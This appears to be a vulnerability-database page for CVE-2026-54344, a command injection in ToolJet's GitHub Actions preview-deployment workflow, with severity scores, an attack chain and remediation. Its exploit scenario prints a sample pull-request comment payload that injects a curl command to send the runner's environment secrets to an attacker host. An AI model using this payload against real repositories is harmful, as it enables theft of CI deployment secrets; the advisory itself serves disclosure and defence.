Skip to main content

ToolJet CVE-2026-54344

| EUVDEUVD-2026-42299 MEDIUM
OS Command Injection (CWE-78)
2026-07-08 GitHub_M
4.7
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
4.7 MEDIUM
AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
vuln.today AI
10.0 CRITICAL

Attack is internet-reachable via GitHub PR comment requiring no authentication (AV:N, PR:N, AC:L); arbitrary CI runner command execution and deployment secret exfiltration justify C:H and I:H with scope change.

3.1 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

2
Patch available
Jul 08, 2026 - 17:01 EUVD
Analysis Generated
Jul 08, 2026 - 16:41 vuln.today

DescriptionCVE.org

ToolJet is an open-source low-code platform for building internal tools. Prior to 3.20.180, ToolJet's render preview deployment workflow interpolates github.event.comment.body directly into a bash conditional in a run step, allowing any GitHub user who can comment on an open pull request with a deploy command to execute shell commands on the CI runner and exfiltrate deployment secrets. This issue is reported as fixed in version 3.20.180.

AnalysisAI

Command injection in ToolJet's GitHub Actions render preview deployment workflow allows any GitHub user capable of commenting on an open pull request to execute arbitrary shell commands on the CI runner and exfiltrate deployment secrets. The root cause is unsanitized interpolation of github.event.comment.body directly into a bash conditional within a run step, meaning a single malicious PR comment can pivot to full CI runner compromise. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify open PR on target ToolJet repository
Delivery
Post PR comment containing shell-injected deploy trigger
Exploit
Render preview GitHub Actions workflow fires on CI runner
Execution
Unsanitized comment body interpolated into bash conditional
Persist
Arbitrary shell commands execute on CI runner
Impact
Deployment secrets exfiltrated to attacker-controlled infrastructure

Vulnerability AssessmentAI

Exploitation The ToolJet render preview deployment workflow must be active in the target repository and configured to fire on PR comment events containing a deploy trigger keyword. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS score of 4.7 (AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N) significantly understates real-world risk and contains apparent metric inconsistencies that should be flagged. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An external GitHub user identifies that ToolJet's repository triggers a render preview deployment workflow on PR comments matching a deploy command pattern. The attacker comments on any open pull request with a payload such as `deploy; curl https://attacker.example.com/x?d=$(env | base64) #`, which is expanded verbatim in the bash conditional. …
Remediation Upgrade ToolJet to version 3.20.180 or later, which is the vendor-confirmed fixed release per advisory GHSA-4pm2-w6g5-28mm at https://github.com/ToolJet/ToolJet/security/advisories/GHSA-4pm2-w6g5-28mm. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2022-3019 HIGH POC
8.8 Aug 29

The forgot password token basically just makes us capable of taking over the account of whoever comment in an app that w

CVE-2022-2631 HIGH POC
8.8 Aug 02

Improper Access Control in GitHub repository tooljet/tooljet prior to v1.19.0. Rated high severity (CVSS 8.8), this vuln

CVE-2022-23067 HIGH POC
8.8 May 18

ToolJet versions v0.5.0 to v1.2.2 are vulnerable to token leakage via Referer header that leads to account takeover . Ra

CVE-2022-2037 HIGH POC
8.0 Jun 09

Excessive Attack Surface in GitHub repository tooljet/tooljet prior to v1.16.0. Rated high severity (CVSS 8.0), this vul

CVE-2022-27978 HIGH POC
7.5 Apr 26

Tooljet v1.6 does not properly handle missing values in the API, allowing attackers to arbitrarily reset passwords via a

CVE-2022-3422 HIGH POC
7.5 Oct 07

Account Takeover :: when see the info i can see the hash pass i can creaked it ............... Rated high severity (CVSS

CVE-2022-4111 MEDIUM POC
6.5 Nov 22

Unrestricted file size limit can lead to DoS in tooljet/tooljet <1.27 by allowing a logged in attacker to upload profile

CVE-2022-27979 MEDIUM POC
5.4 Apr 26

A cross-site scripting (XSS) vulnerability in ToolJet v1.6.0 allows attackers to execute arbitrary web scripts or HTML v

CVE-2026-55413 CRITICAL
9.4 Jun 25

Stored code injection in ToolJet self-hosted (prior to 3.20.178-lts) lets any authenticated builder-role user - availabl

CVE-2022-23068 MEDIUM POC
5.4 May 18

ToolJet versions v0.6.0 to v1.10.2 are vulnerable to HTML injection where an attacker can inject malicious code inside t

CVE-2022-3348 MEDIUM POC
4.9 Sep 28

Just like in the previous report, an attacker could steal the account of different users. Rated medium severity (CVSS 4.

CVE-2026-55412 HIGH
8.3 Jun 25

Server-side request forgery in ToolJet's RestAPI data source (versions prior to 3.20.178-lts) allows a low-privileged pl

Share

CVE-2026-54344 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy